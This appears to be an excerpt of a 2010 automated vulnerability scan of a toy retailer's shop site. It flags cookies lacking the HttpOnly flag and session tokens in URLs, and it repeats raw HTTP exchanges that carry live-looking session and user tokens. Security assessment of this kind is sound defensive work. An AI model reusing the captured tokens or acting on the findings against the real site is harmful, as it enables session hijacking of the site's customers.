HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:16:04 GMT Server: Apache/2.0.63 (Unix) Cache-Control: no-cache="set-cookie" P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml" Set-Cookie: JSESSIONID=z2JTNSJGhpmmnjKYH7vGhX4Xk9ZThL4KvvQmnmT1QN5WhZmWlN5h!-1434729825; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 51584
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/ ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /giftCertificates/index.jsp HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /product/wishlist/wishlist.jsp HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://shop.mattel.com/coreg/inde ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /search/controller.jsp HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 302 Moved Temporarily Date: Thu, 23 Dec 2010 00:16:17 GMT Server: Apache/2.0.63 (Unix) Cache-Control: no-cache="set-cookie" Pragma: no-cache Location: http://shop.mattel.com/home/index.jsp?sr=1 P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml" Set-Cookie: JSESSIONID=nNbLNSJRqVrxQdwRHw36YXlWtdsyz19pHJvCJ9Nvs8BXjClZGT1Q!-1434729825; path=/ Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:30:24 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 279
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://shop.mattel.com/home/index. ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /shop/index.jsp HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://shop.mattel.com/shop/index. ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /storeLocator/index.jsp HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-Cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /product/index.jsp?productId=4199678 HTTP/1.1 Host: shop.mattel.com Proxy-Connection: keep-alive Referer: http://www.barbie.com/videogirl/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=46650939.1293081033.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=46650939.544434872.1293081033.1293081033.1293081033.1; __utmc=46650939
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:09:12 GMT Server: Apache/2.0.63 (Unix) Cache-Control: no-cache="set-cookie" P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml" Set-Cookie: JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; path=/ Set-Cookie: browser_id=118201181974; expires=Sunday, 20-Dec-2020 00:09:12 GMT; path=/ Set-Cookie: browser_id=118201181974; expires=Sunday, 20-Dec-2020 00:09:12 GMT; path=/ Set-Cookie: browser_id=118201181974; expires=Sunday, 20-Dec-2020 00:09:12 GMT; path=/ Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:23:19 GMT; path=/ Set-Cookie: browser_id=118201181974; expires=Sunday, 20-Dec-2020 00:09:12 GMT; path=/ Set-Cookie: browser_id=118201181974; expires=Sunday, 20-Dec-2020 00:09:12 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 54256
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /affiliate/index.jsp HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /brand/index.jsp HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cart/index.jsp HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://shop.mattel.com/cart/index. ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 302 Moved Temporarily
Date: Thu, 23 Dec 2010 00:11:07 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Location: https://shop.mattel.com/checkout/index.jsp?process=myaccount
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; expires=Sunday, 20-Dec-2020 00:11:07 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 315
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://shop.mattel.com/checkout/i ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /coreg/index.jsp?step=logout HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 302 Moved Temporarily
Date: Thu, 23 Dec 2010 00:15:36 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Location: https://shop.mattel.com/checkout/index.jsp?process=home
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: JSESSIONID=6TpLNSJL0sSbVTJGNGF9tvc8WHGvvD4HfTGyLfTM2DLYnwBrX1SZ!-1434729825; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 305
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://shop.mattel.com/checkout/i ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /emailSignup/index.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:16:04 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: JSESSIONID=z2JTNSJGhpmmnjKYH7vGhX4Xk9ZThL4KvvQmnmT1QN5WhZmWlN5h!-1434729825; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 51584
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/ ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /giftCertificates/index.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /product/wishlist/wishlist.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://shop.mattel.com/coreg/inde ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /search/controller.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 302 Moved Temporarily
Date: Thu, 23 Dec 2010 00:16:17 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Location: http://shop.mattel.com/home/index.jsp?sr=1
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: JSESSIONID=nNbLNSJRqVrxQdwRHw36YXlWtdsyz19pHJvCJ9Nvs8BXjClZGT1Q!-1434729825; path=/
